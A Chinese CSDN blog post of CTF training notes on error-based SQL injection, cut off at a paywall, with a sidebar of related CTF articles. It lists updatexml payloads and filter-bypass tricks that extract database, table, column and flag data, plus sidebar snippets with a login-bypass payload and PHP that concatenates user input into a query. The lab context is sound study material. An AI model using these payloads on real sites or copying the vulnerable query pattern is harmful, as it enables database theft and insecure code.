7月30日CTFsql注入训练

最新推荐文章于 2024-05-16 02:47:32 发布
最新推荐文章于 2024-05-16 02:47:32 发布
阅读量1k 收藏 2
点赞数
分类专栏: 笔记 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slc3315/article/details/107696658
版权

题记:
这几天最崩溃的,鼓捣了两个小时,从正确答案到绕过所有终止符,从托库出数据表数据字段到non-numeric,闹混了头。以此为戒切勿钻牛角尖。

一、报错注入

题目:
在这里插入图片描述思路:
很明显,本题是报错注入,注意被绕过的关键词就可以

步骤一:试探

首先是随意提交个用户名和密码,发现是get传参,尝试测试几个关键词,如‘ “ 空格 = + - )等,以及select、union、or、information等
在这里插入图片描述没有屏蔽且符合报错注入判断标准的如上图
在这里插入图片描述被屏蔽的关键词如上图
因此可以测试出来,本题为单引号注入,且空格、union、=等均被屏蔽
小技巧: =可以改为like;空格改为()

步骤二:传链接

小笔记by老师

//数据库
username=a"^updatexml(1,concat(0x7e,(database()),0x7e),1)#&password=a&email=admin
//表名
username=a"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#&password=a&email=admin
//flag的列名
username=a"^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1)#&password=a&email=a
//取数
username=a"^updatexml(1,concat(0x7e,(select(flag)from(flag)),0x7e),1)#&password=a&email=a

//user的列名
username=a"^updatexml(1,concat(0x7e,(select(group_concat(column_
最低0.47元/天 解锁文章
陆小朝
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
729CTFsql注入训练
slc3315的博客
07-29 937
一、g00d_sql 题目: 思路: 这个题其实就是weblib闯关的一道题 两个输入框分别是用户名和密码,主要考注入 步骤一:试探 先用户名输入1,密码1,试一试 发现报错后,试一试万能密码 1’ or 1=1# 明显可以采用注入的方式 步骤二:手工注入 按照以下步骤开工: 1)判断是否存在注入点; 2)判断字段长度; 3)判断字段回显位置; 4)判断数据库信息; 5)查找数据库名; 6)查找数据库表; 7)查找数据库表中所有字段以及字段值; payload: -1’ union select 1,gr
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
攻防_漏洞_SQL注入_SQL注入常用方法
redglare的博客
12-01 2257
SQL注入常用方法
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4777
以pikachu靶场练习来学习ctf知识
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84968222的博客
05-16 788
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
CTF中几种通用的sql盲注手法和注入的一些tips
xuchen16的博客
10-09 2553
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的...
CTF Web SQL注入专项整理(持续更新中)
m0_73734159的博客
10-19 2897
SQL注入专项整理
CTFer成长之路之CTF中的SQL注入
自强不息
02-20 1489
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
sql注入攻击流量情况
07-18
sql注入攻击流量情况
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
SQL注入漏洞演示源代码
07-15
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段...
CTF 加密 解密 SQL注入 BASE64
03-19
在网络安全领域,CTF(Capture The Flag)是一种常见的竞赛形式,它涵盖了多种技术挑战,包括但不限于加密、解密、SQL注入以及编码技术如BASE64。在这个场景中,我们将深入探讨这些关键知识点。 首先,加密与解密是...
CTF-SQL注入
weixin_44770698的博客
06-16 5031
CTF-SQL注入题目整理
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 2981
sql注入
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3994
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTF入门之SQL注入
PolarPeak的博客
12-08 2166
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTF-Web SQL注入
weixin_52182264的博客
04-26 4235
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1376
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值